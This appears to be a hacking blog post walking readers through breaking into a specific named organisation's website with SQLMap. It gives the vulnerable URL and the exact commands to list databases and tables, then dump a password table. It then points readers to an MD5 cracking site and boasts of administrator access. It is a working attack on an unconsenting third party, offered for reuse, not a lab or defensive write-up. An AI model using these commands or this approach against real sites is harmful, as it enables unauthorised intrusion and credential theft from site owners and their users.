Hello friends !!!
Meet with me again
"phiA" , now i want to tell you how to hack some website using SQLMap [tools] on Back|Track.
When you want to hack a website with sqlmap there are several requirements that must be met, one of which is a website that has a crack SQL Injection or bug and the website must have parameter like index.php?id=.
# DEMONSTRATION
Oke I have one target, you can see the link below.
http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72%27
or you can see the picture of that error [if the administrator patch that bug]
http://i1262.photobucket.com/albums/ii607/phia0343/1.png
Now is time for start our party ! "Here we GOOOO"
#1 first step you must open your SQLMap on your backtrack, the location is on [+]
Application => BackTrack => Exploitation Tolls => Web Exploitation Tolls => SQLMap
or you can type on terminal :
root@phiA:~# cd /pentest/database/sqlmap
and now you just entered the SQLMap tools [Command Line Interface].
#2 After you entered on SQLMap tools now you must type.
root@phiA:/pentest/database/sqlmap#./sqlmap.py -u http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72 --dbs
now SQLMap will show you the database name like this picture.
http://i1262.photobucket.com/albums/ii607/phia0343/2.png
[+] Note : ./sqlmap.py => his comment to execute SQLMap and SQLMap is built
with python program.
-u => the url of your target.
--dbs => command to find database name.
#3 Now we know all the database name of our target, now is time for search table name from the database, we will search table of password , user or etc. I'll try to search on pkkprovkalsel [databasename] type this command !
root@phiA:/pentest/databse/sqlmap#./sqlmap.py -u http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72 -D pkkprovkalsel --tables
now you can see the tables name of the database , woww that table password isn't ? you can see the picture below
http://i1262.photobucket.com/albums/ii607/phia0343/3.png
Note: [+]
-D : database name
--tables : command to search tables name
#4 After step #3 we got table password , now is time for find out the value of that tables. Type on your console.
root@phiA:/pentest/databse/sqlmap#./sqlmap.py -u http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72 -D pkkprovkalsel -T password --columns
and then SQLMap will show you the columns of password table.
http://i1262.photobucket.com/albums/ii607/phia0343/4.png
Note [+]
-T : tables name
--columns : command to find columns
#5 Almost done ! the final step we must dump that column, type on you console.
root@phiA:/pentest/databse/sqlmap#./sqlmap.py -u http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72 -D pkkprovkalsel -T password --dump
now you got Administrator password, but the password is hashes . Visit
http://www.md5decrypter.co.uk to decrypt that password.
A : Fake tutorial noobs , u can login as Administrator on that site !!!
Q : Take it easy broo , offcourse i can login as Administrator on that site.
#6 Find login admin on our target. [in other tutorial i'll share it]
Done !!! we got admin login page . Check this out bro...
http://i1262.photobucket.com/albums/ii607/phia0343/6.png
yeahhh that the Administrator login loLz ^__^"
#7 Finally we login as Administrator.
http://i1262.photobucket.com/albums/ii607/phia0343/7.png
Now you can do anything with our target bro.
Note :
I purposely did not deliver images directly to you, because it will make weight my blog.
Thankyou for watching and visit my blog. Byee ^__^"
Greetz : All Indonesian Hacktivist.